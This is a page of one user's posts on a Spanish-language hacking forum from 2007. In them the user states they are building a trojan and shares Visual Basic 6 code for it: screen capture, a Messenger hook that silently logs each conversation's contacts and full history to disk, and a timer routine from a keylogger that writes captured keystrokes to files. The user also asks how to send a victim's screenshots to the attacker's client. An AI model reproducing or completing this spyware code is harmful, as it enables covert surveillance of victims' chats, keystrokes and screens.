elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9
51  Programación / Programación Visual Basic / Re: Capturar Pantalla[Code+Pregunta xD] en: 5 Mayo 2007, 03:24 am
eso lo tengo mas o menos claro.. lo que falta es la llegada al cliente.. y nose si devolverle lo que tenia en el portapapeles.. pero me conformo con borrarlo xD
alguien tiene una idea de como hacer la llegada al cliente?
52  Programación / Programación Visual Basic / Capturar Pantalla[Code+Pregunta xD] en: 5 Mayo 2007, 03:07 am
bueno.. este code tiene 2 intenciones, ayudar y que me ayuden xD, ya vendran posts solamente para ayudar.. pero mientras sepa poco no creo que pueda ser asi =S

aca va la ayuda, es el code para capturar ventanas activas, y pantalla completa, perdon si ya estaba posteado, pero no lo encontre en el foro

Código:
Private Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

Private Sub Command1_Click()
'Captura la ventana activa
keybd_event 44, 0, 0&, 0&
End Sub

Private Sub Command2_Click()
'Captura toda la pantalla
keybd_event 44, 1, 0&, 0&
End Sub

y aca va la pregunta:
teniendo este code, a alguien se le ocurre alguna forma, de enviar la imagen capturada al cliente (teniendo en cuenta que estoi asiendo un troyano), y que se muestre en el form???, una idea de Vivachapas, era capturar pantalla, guardar la imagen en el disco de la victima, enviarla al cliente, i borrarla, pero como puedo hacer que se muestre en un form??? con un imagebox???
se acepta orientacion y ayuda! ;D
Gracias de Antemano!
53  Programación / Programación Visual Basic / Re: Capturar conversaciones de msn completas en vb6? en: 1 Mayo 2007, 05:21 am
gracias Jareth!! al parecer me salvas en todos los posts  ;D
lo encontre en vbfrance.com por capturer conversation msn
aka va el code por si alguien lo quiere
lo unico que hay que hacer es agregar la api de messenger
para agregarla vayan a Proyecto, Referencias, y seleccionan Messenger Api Type Library

Código:
Option Explicit
Private WithEvents objMessenger As MessengerAPI.Messenger

Private Sub Form_Load()
    Set objMessenger = New MessengerAPI.Messenger
End Sub

Private Sub objMessenger_OnIMWindowDestroyed(ByVal pIMWindow As Object)
    Dim MsgrIMWindow As IMessengerConversationWnd
    Dim MsgrContacts As IMessengerContacts
    Dim i As Long
    Dim fil As Integer
    Dim strTmpText As String
   
    Set MsgrIMWindow = pIMWindow
    Set MsgrContacts = MsgrIMWindow.Contacts
     
    If MsgrContacts.Count = 0 Then
        strTmpText = "test"
    Else
        strTmpText = MsgrContacts.Item(0).SigninName
    End If
   
    fil = FreeFile()
    Open "C:\test\" & strTmpText & ".log" For Append As #fil
        Print #fil, "_______________________________________________________________________________________"
        Print #fil, "Le " & Date & " a " & Time
        Print #fil, "Contactos de la Conversacion (" & MsgrContacts.Count & "): "
        For i = 0 To MsgrContacts.Count - 1
            Print #fil, " - " & MsgrContacts.Item(i).FriendlyName & "<" & MsgrContacts.Item(0).SigninName & ">"
        Next
        Print #fil, "---------------------------------------------------------------------------------------"
        Print #fil, MsgrIMWindow.History
        Print #fil, "_______________________________________________________________________________________" & vbCrLf
    Close #fil
End Sub
54  Programación / Programación Visual Basic / Re: Capturar conversaciones de msn completas en vb6? en: 1 Mayo 2007, 01:00 am
muchas gracias E0N muy buena la api  me podria servir mucho.. pero hay alguna forma de activarle guardar los historiales con esa api???
55  Programación / Programación Visual Basic / Re: Capturar conversaciones de msn completas en vb6? en: 30 Abril 2007, 21:41 pm
alguien podria ayudarme!? no encuentro nada en el foro!
56  Programación / Programación Visual Basic / Re: Capturar conversaciones de msn completas en vb6? en: 30 Abril 2007, 18:57 pm
Tesis, como ya lo dije en mi post NO encontre nada que me sirva, por eso posteo aca, si tienes algo en que aportar se te agradeceria
57  Programación / Programación Visual Basic / [Codigo]Capturar conversaciones de msn completas en vb6 en: 30 Abril 2007, 17:38 pm
weno.. estoy creando un troyano en vb6, multi c.i, y seria interesante añadirle la funcion de capturar una conversacion completa de msn, como lo hace la funcion de guardar historiales en msn
alguien se le ocurre alguna idea???
Gracias de antemano  ;D

PD: ya estuve buscando, no encontre nada que me convenciera
58  Programación / Programación Visual Basic / Re: cambiar icono a mi programa en vb en: 30 Abril 2007, 16:13 pm
muchas gracias ya lo solcuione  ;D
yo por lo menos ocupo el IcoFX, aparte de ser gratuito es muy comodo. liviano y bueno, recomendado :D
59  Programación / Programación Visual Basic / Re: problema con keylogger en vb6 en: 29 Abril 2007, 02:09 am
wajaj x aora todo bien!
ia enverdad no se que hacer!!! no me funciona para nada, en el contador siempre ai un numero diferente, que no corresponde, y hasta probe abriendo el contador i poniendo 3 (ya habian 2 logs generados y queria un 3) y tampoco, el contador cambio a 2 y me lo remplazo..
QUE puedo hacer!!??!?!??!?!!?!? :-(
60  Programación / Programación Visual Basic / Re: problema con keylogger en vb6 en: 28 Abril 2007, 23:37 pm
ia lo entendi! xD
pero al parecer no funciona muy bien =S
al principio va todo bien, genera los logs debidamente, etc, pero para probar, reinicie el keylogger, i en ves aora de guardar los logs, solo abre la carpeta C:\ podrias ver que pasa con el code??? lo habias probado??=S
este code ocupe

Código:
Private Sub Timer2_Timer()
KTime = KTime + 1
Label1.Caption = KTime
n = 1
If KTime = 100 Then
ruta = Dir$("c:\" & n & ".txt")
    If ruta = "" Then
    Open "c:\" & n & ".txt" For Output As #1
    Print #1, , Text1.Text
    Close #1
    Else
    n = n + 1
    Open "c:\" & n & ".txt" For Output As #1
    Print #1, , Text1.Text
    Close #1
    End If
Text1.Text = ""
KTime = 0
End If
End Sub
Páginas: 1 2 3 4 5 [6] 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines